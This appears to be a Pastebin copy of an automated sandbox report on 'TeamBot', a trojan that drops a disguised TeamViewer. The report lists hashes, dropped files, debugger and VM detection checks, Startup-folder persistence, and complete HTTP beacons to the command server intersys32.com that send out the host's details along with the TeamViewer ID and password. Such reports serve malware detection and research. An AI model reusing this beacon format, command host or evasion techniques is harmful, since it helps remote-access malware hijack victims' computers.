Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "TeamBot"
- * MalScore: 10.0
- * File Name: "Exes_e1167cb7f3735d4edec5f7219cea64ef.1"
- * File Size: 3998591
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "b2ab87d5408a19b0d65d49b74c0f3d879ac55c3e57117e4117ff500394e2ad17"
- * MD5: "e1167cb7f3735d4edec5f7219cea64ef"
- * SHA1: "9b32cbdba2f3f40f2072dbeb61b345c910e45b39"
- * SHA512: "e62104b529dfb87203ee3f8406259284663e0d7bc2c02836253c2c1788a0798241377e48d4609cc0ec2295028ff171a746b3fe1537c8cc235a1f3981699122a8"
- * CRC32: "D69AC9C3"
- * SSDEEP: "98304:SB/mSwJ/stDHmKRai2+DyAEJ9v00FabNuATit4QqKUiqIa4j1yj:SB/m1/Cfe+i9M0oMP//a48j"
- * Process Execution:
- "Exes_e1167cb7f3735d4edec5f7219cea64ef.1",
- "TeamViewer.exe"
- * Executed Commands:
- "C:\\Users\\user\\AppData\\Local\\Temp\\PmIgYzA\\TeamViewer.exe "
- * Signatures Detected:
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Attempts to connect to a dead IP:Port (7 unique times)",
- "Details":
- "IP": "23.60.139.27:80"
- "IP": "188.172.214.62:5938"
- "IP": "185.188.32.3:5938"
- "IP": "127.0.0.1:9998"
- "IP": "72.21.81.240:80"
- "IP": "213.227.185.141:5938"
- "IP": "72.21.91.29:80"
- "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
- "Details":
- "ioc": "nc.1705"
- "ioc": "https://d.symcb.com/cps0"
- "ioc": "https://d.symcb.com/rpa0"
- "ioc": "nc.1402"
- "Description": "Starts servers listening on 127.0.0.1:9997",
- "Details":
- "Description": "Expresses interest in specific running processes",
- "Details":
- "process": "System"
- "Description": "Reads data out of its own binary image",
- "Details":
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00000000, length: 0x00000007"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00000000, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00000007, length: 0x001ffff0"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00001ff0, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00003fe0, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00005fd0, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00007fc0, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00009fb0, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x0000bfa0, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x0000df90, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x0000ff80, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00011f70, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00013f60, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00015f50, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00017f40, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00019f30, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x0001bf20, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x0001df10, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x0001ff00, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00021ef0, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00023ee0, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00025ed0, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00027ec0, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00029eb0, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x0002bea0, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x0002de90, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x0002fe80, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00031e70, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00033e60, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00035e50, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00037e40, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x00039e30, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x0003be20, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x0003de10, length: 0x00002000"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x0003f600, length: 0x00000031"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x0003f619, length: 0x00390c6a"
- "self_read": "process: Exes_e1167cb7f3735d4edec5f7219cea64ef.1, pid: 2952, offset: 0x003d0377, length: 0x00000008"
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\PmIgYzA\\TeamViewer.exe"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
- "suspicious_request": "http://intersys32.com/3307/?gate&hwid=C1C5B64F&id=000%20000%20000&pwd=0000&info=%7B%22os%22%3A%22Windows%20%37%20Enterprise%20N%20x%36%34%22%2C%22pcuser%22%3A%22SBUW%37X%36%34%5C%5Cuser%22%2C%22cpu%22%3A%22Intel%28R%29%20Core%28TM%29CPU%20E%35%2D%32%36%37%30%20%30%20%40%20%32%2E%36%30GHz%22%2C%22ram%22%3A%22%34%30%39%35mb%22%2C%22av%22%3A%22nil%22%2C%22admin%22%3A%22YES%22%2C%22comment%22%3A%22hTV%5Fbot%5F%5Bv%31%2E%33%5D%22%7D"
- "suspicious_request": "http://crl.verisign.com/pca3.crl"
- "suspicious_request": "http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECXJAtAm4xJEwSWZZ3HJ3AE%3D"
- "suspicious_request": "http://intersys32.com/3307/?gate&hwid=C1C5B64F&id=1%20337%20066%20113&pwd=9058&info=%7B%22os%22%3A%22Windows%20%37%20Enterprise%20N%20x%36%34%22%2C%22pcuser%22%3A%22SBUW%37X%36%34%5C%5Cuser%22%2C%22cpu%22%3A%22Intel%28R%29%20Core%28TM%29CPU%20E%35%2D%32%36%37%30%20%30%20%40%20%32%2E%36%30GHz%22%2C%22ram%22%3A%22%34%30%39%35mb%22%2C%22av%22%3A%22nil%22%2C%22admin%22%3A%22YES%22%2C%22comment%22%3A%22hTV%5Fbot%5F%5Bv%31%2E%33%5D%22%7D"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://intersys32.com/3307/?gate&hwid=C1C5B64F&id=000%20000%20000&pwd=0000&info=%7B%22os%22%3A%22Windows%20%37%20Enterprise%20N%20x%36%34%22%2C%22pcuser%22%3A%22SBUW%37X%36%34%5C%5Cuser%22%2C%22cpu%22%3A%22Intel%28R%29%20Core%28TM%29CPU%20E%35%2D%32%36%37%30%20%30%20%40%20%32%2E%36%30GHz%22%2C%22ram%22%3A%22%34%30%39%35mb%22%2C%22av%22%3A%22nil%22%2C%22admin%22%3A%22YES%22%2C%22comment%22%3A%22hTV%5Fbot%5F%5Bv%31%2E%33%5D%22%7D"
- "url": "http://crl.verisign.com/pca3.crl"
- "url": "http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECXJAtAm4xJEwSWZZ3HJ3AE%3D"
- "url": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
- "url": "http://intersys32.com/3307/?gate&hwid=C1C5B64F&id=1%20337%20066%20113&pwd=9058&info=%7B%22os%22%3A%22Windows%20%37%20Enterprise%20N%20x%36%34%22%2C%22pcuser%22%3A%22SBUW%37X%36%34%5C%5Cuser%22%2C%22cpu%22%3A%22Intel%28R%29%20Core%28TM%29CPU%20E%35%2D%32%36%37%30%20%30%20%40%20%32%2E%36%30GHz%22%2C%22ram%22%3A%22%34%30%39%35mb%22%2C%22av%22%3A%22nil%22%2C%22admin%22%3A%22YES%22%2C%22comment%22%3A%22hTV%5Fbot%5F%5Bv%31%2E%33%5D%22%7D"
- "Description": "Checks for the presence of known windows from debuggers and forensic tools",
- "Details":
- "Window": "OLLYDBG"
- "Window": "GBDYLLO"
- "Window": "pediy06"
- "Window": "FilemonClass"
- "Window": "File Monitor - Sysinternals: www.sysinternals.com"
- "Window": "PROCMON_WINDOW_CLASS"
- "Window": "Process Monitor - Sysinternals: www.sysinternals.com"
- "Window": "RegmonClass"
- "Window": "Registry Monitor - Sysinternals: www.sysinternals.com"
- "Window": "18467-41"
- "Window": "Regmonclass"
- "Window": "Filemonclass"
- "Description": "A process attempted to delay the analysis task by a long amount of time.",
- "Details":
- "Process": "TeamViewer.exe tried to sleep 3051 seconds, actually delayed analysis time by 0 seconds"
- "Description": "Tries to unhook or modify Windows functions monitored by Cuckoo",
- "Details":
- "unhook": "function_name: SystemParametersInfoW, type: modification"
- "Description": "The following process appear to have been packed with Themida: TeamViewer.exe",
- "Details":
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\GatewayLayer 1.3957.lnk"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\GatewayLayer 1.3957.lnk"
- "Description": "Creates a hidden or system file",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\PmIgYzA\\TeamViewer.exe"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\PmIgYzA\\TV.dll"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\PmIgYzA\\Teamviewer_Resource_fr.dll"
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\PmIgYzA\\config.bin"
- "Description": "Checks for the presence of known devices from debuggers and forensic tools",
- "Details":
- "Description": "Detects the presence of Wine emulator via registry key",
- "Details":
- "Description": "Checks the version of Bios, possibly for anti-virtualization",
- "Details":
- "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
- "Details":
- "Description": "Detects VirtualBox using ACPI tricks",
- "Details":
- "Description": "Detects VirtualBox through the presence of a registry key",
- "Details":
- "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
- "Details":
- "target": "clamav:Win.Trojan.TeamBot-6987039-0, sha256:b2ab87d5408a19b0d65d49b74c0f3d879ac55c3e57117e4117ff500394e2ad17, type:PE32 executable (GUI) Intel 80386, for MS Windows"
- "dropped": "clamav:Win.Trojan.TeamBot-6987075-0, sha256:28764e617667c9704246c56b613d1b75e489346cbb5df9a14e1ce2d996f5c167 , guest_paths:C:\\Users\\user\\AppData\\Local\\Temp\\PmIgYzA\\TV.dll, type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows"
- * Started Service:
- * Mutexes:
- "DefaultTabtip-MainUI",
- "CicLoadWinStaWinSta0",
- "Local\\MSCTF.CtfMonitorInstMutexDefault1",
- "DBWinMutex",
- "FF0x7d_Win32_Instance_Mutex",
- "FF0x7d3_Win32_Instance_Mutex",
- "FF0x7dDyn_Win32_Instance_Mutex",
- "C15730E2-145C-4c5e-B005-3BC753F42475-once-flagEBEJJIAAAOFAAAAA"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\PmIgYzA\\__tmp_rar_sfx_access_check_8255625",
- "C:\\Users\\user\\AppData\\Local\\Temp\\PmIgYzA\\config.bin",
- "C:\\Users\\user\\AppData\\Local\\Temp\\PmIgYzA\\Teamviewer_Resource_fr.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\PmIgYzA\\TV.dll",
- "C:\\Users\\user\\AppData\\Local\\Temp\\PmIgYzA\\TeamViewer.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\PmIgYzA\\FZhIG.ico",
- "\\??\\PIPE\\srvsvc",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\GatewayLayer 1.3957.lnk",
- "\\??\\SICE",
- "\\??\\SIWVID",
- "\\??\\NTICE",
- "C:\\Users\\user\\AppData\\Local\\Temp\\PmIgYzA\\0.0",
- "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\60E31627FDA0A46932B0E5948949F2A5",
- "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\60E31627FDA0A46932B0E5948949F2A5",
- "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3C3948BE6E525B8A8CEE9FAC91C9E392_EEB8C7E9A435DC539B7A34AD155842C4",
- "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3C3948BE6E525B8A8CEE9FAC91C9E392_EEB8C7E9A435DC539B7A34AD155842C4",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Cab2A7D.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Tar2A7E.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Cab2AFC.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Tar2AFD.tmp",
- "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015",
- "C:\\Users\\user\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Cab2FC0.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Tar2FC1.tmp",
- "C:\\Users\\user\\AppData\\Roaming\\TeamViewer\\TeamViewer5_Logfile.log",
- "C:\\Program Files (x86)\\QS\\SAS.exe",
- "\\??\\PIPE\\wkssvc",
- "\\Device\\LanmanDatagramReceiver",
- "\\??\\PIPE\\DAV RPC SERVICE"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\PmIgYzA\\__tmp_rar_sfx_access_check_8255625",
- "C:\\Users\\user\\AppData\\Local\\Temp\\PmIgYzA\\QS.ini",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Cab2A7D.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Tar2A7E.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Cab2AFC.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Tar2AFD.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Cab2FC0.tmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\Tar2FC1.tmp"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\WinRAR SFX",
- "HKEY_CURRENT_USER\\Software\\WinRAR SFX\\C%%Users%user%AppData%Local%Temp%PmIgYzA%",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MediaResources\\msvideo"
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "intersys32.com",
- "answers":
- "data": "209.99.40.223",
- "type": "A"
- "type": "A",
- "request": "crl.verisign.com",
- "answers":
- "data": "crl-symcprod.digicert.com",
- "type": "CNAME"
- "data": "cs9.wac.phicdn.net",
- "type": "CNAME"
- "data": "72.21.91.29",
- "type": "A"
- "type": "A",
- "request": "ocsp.verisign.com",
- "answers":
- "data": "ocsp-ds.ws.symantec.com.edgekey.net",
- "type": "CNAME"
- "data": "e8218.dscb1.akamaiedge.net",
- "type": "CNAME"
- "data": "23.60.139.27",
- "type": "A"
- "type": "A",
- "request": "ping3.dyngate.com",
- "answers":
- "data": "188.172.214.62",
- "type": "A"
- "data": "162.250.6.158",
- "type": "A"
- "data": "162.250.5.94",
- "type": "A"
- "data": "213.227.173.158",
- "type": "A"
- "data": "162.220.222.190",
- "type": "A"
- "data": "ping3.teamviewer.com",
- "type": "CNAME"
- "type": "A",
- "request": "master11.teamviewer.com",
- "answers":
- "data": "185.188.32.3",
- "type": "A"
- * Domains:
- "ip": "162.250.6.158",
- "domain": "ping3.dyngate.com"
- "ip": "23.60.139.27",
- "domain": "ocsp.verisign.com"
- "ip": "72.21.91.29",
- "domain": "crl.verisign.com"
- "ip": "185.188.32.3",
- "domain": "master11.teamviewer.com"
- "ip": "209.99.40.222",
- "domain": "intersys32.com"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 1,
- "body": "",
- "uri": "http://intersys32.com/3307/?gate&hwid=C1C5B64F&id=000%20000%20000&pwd=0000&info=%7B%22os%22%3A%22Windows%20%37%20Enterprise%20N%20x%36%34%22%2C%22pcuser%22%3A%22SBUW%37X%36%34%5C%5Cuser%22%2C%22cpu%22%3A%22Intel%28R%29%20Core%28TM%29CPU%20E%35%2D%32%36%37%30%20%30%20%40%20%32%2E%36%30GHz%22%2C%22ram%22%3A%22%34%30%39%35mb%22%2C%22av%22%3A%22nil%22%2C%22admin%22%3A%22YES%22%2C%22comment%22%3A%22hTV%5Fbot%5F%5Bv%31%2E%33%5D%22%7D",
- "user-agent": "",
- "method": "GET",
- "host": "intersys32.com",
- "version": "1.1",
- "path": "/3307/?gate&hwid=C1C5B64F&id=000%20000%20000&pwd=0000&info=%7B%22os%22%3A%22Windows%20%37%20Enterprise%20N%20x%36%34%22%2C%22pcuser%22%3A%22SBUW%37X%36%34%5C%5Cuser%22%2C%22cpu%22%3A%22Intel%28R%29%20Core%28TM%29CPU%20E%35%2D%32%36%37%30%20%30%20%40%20%32%2E%36%30GHz%22%2C%22ram%22%3A%22%34%30%39%35mb%22%2C%22av%22%3A%22nil%22%2C%22admin%22%3A%22YES%22%2C%22comment%22%3A%22hTV%5Fbot%5F%5Bv%31%2E%33%5D%22%7D",
- "data": "GET /3307/?gate&hwid=C1C5B64F&id=000%20000%20000&pwd=0000&info=%7B%22os%22%3A%22Windows%20%37%20Enterprise%20N%20x%36%34%22%2C%22pcuser%22%3A%22SBUW%37X%36%34%5C%5Cuser%22%2C%22cpu%22%3A%22Intel%28R%29%20Core%28TM%29CPU%20E%35%2D%32%36%37%30%20%30%20%40%20%32%2E%36%30GHz%22%2C%22ram%22%3A%22%34%30%39%35mb%22%2C%22av%22%3A%22nil%22%2C%22admin%22%3A%22YES%22%2C%22comment%22%3A%22hTV%5Fbot%5F%5Bv%31%2E%33%5D%22%7D HTTP/1.1\r\nHost: intersys32.com\r\nConnection: close\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://crl.verisign.com/pca3.crl",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "crl.verisign.com",
- "version": "1.1",
- "path": "/pca3.crl",
- "data": "GET /pca3.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.verisign.com\r\n\r\n",
- "port": 80
- "count": 1,
- "body": "",
- "uri": "http://ocsp.verisign.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECXJAtAm4xJEwSWZZ3HJ3AE%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.verisign.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECXJAtAm4xJEwSWZZ3HJ3AE%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ%2FxkCfyHfJr7GQ6M658NRZ4SHo%2FAQUCPVR6Pv%2BPT1kNnxoz1t4qN%2B5xTcCECXJAtAm4xJEwSWZZ3HJ3AE%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.verisign.com\r\n\r\n",
- "port": 80
- "count": 2,
- "body": "",
- "uri": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "www.download.windowsupdate.com",
- "version": "1.1",
- "path": "/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
- "data": "GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\r\nCache-Control: max-age = 86401\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Fri, 22 Feb 2019 16:53:13 GMT\r\nIf-None-Match: \"80e22c19cfcad41:0\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: www.download.windowsupdate.com\r\n\r\n",
- "port": 80
- "count": 9,
- "body": "",
- "uri": "http://intersys32.com/3307/?gate&hwid=C1C5B64F&id=1%20337%20066%20113&pwd=9058&info=%7B%22os%22%3A%22Windows%20%37%20Enterprise%20N%20x%36%34%22%2C%22pcuser%22%3A%22SBUW%37X%36%34%5C%5Cuser%22%2C%22cpu%22%3A%22Intel%28R%29%20Core%28TM%29CPU%20E%35%2D%32%36%37%30%20%30%20%40%20%32%2E%36%30GHz%22%2C%22ram%22%3A%22%34%30%39%35mb%22%2C%22av%22%3A%22nil%22%2C%22admin%22%3A%22YES%22%2C%22comment%22%3A%22hTV%5Fbot%5F%5Bv%31%2E%33%5D%22%7D",
- "user-agent": "",
- "method": "GET",
- "host": "intersys32.com",
- "version": "1.1",
- "path": "/3307/?gate&hwid=C1C5B64F&id=1%20337%20066%20113&pwd=9058&info=%7B%22os%22%3A%22Windows%20%37%20Enterprise%20N%20x%36%34%22%2C%22pcuser%22%3A%22SBUW%37X%36%34%5C%5Cuser%22%2C%22cpu%22%3A%22Intel%28R%29%20Core%28TM%29CPU%20E%35%2D%32%36%37%30%20%30%20%40%20%32%2E%36%30GHz%22%2C%22ram%22%3A%22%34%30%39%35mb%22%2C%22av%22%3A%22nil%22%2C%22admin%22%3A%22YES%22%2C%22comment%22%3A%22hTV%5Fbot%5F%5Bv%31%2E%33%5D%22%7D",
- "data": "GET /3307/?gate&hwid=C1C5B64F&id=1%20337%20066%20113&pwd=9058&info=%7B%22os%22%3A%22Windows%20%37%20Enterprise%20N%20x%36%34%22%2C%22pcuser%22%3A%22SBUW%37X%36%34%5C%5Cuser%22%2C%22cpu%22%3A%22Intel%28R%29%20Core%28TM%29CPU%20E%35%2D%32%36%37%30%20%30%20%40%20%32%2E%36%30GHz%22%2C%22ram%22%3A%22%34%30%39%35mb%22%2C%22av%22%3A%22nil%22%2C%22admin%22%3A%22YES%22%2C%22comment%22%3A%22hTV%5Fbot%5F%5Bv%31%2E%33%5D%22%7D HTTP/1.1\r\nHost: intersys32.com\r\nConnection: close\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment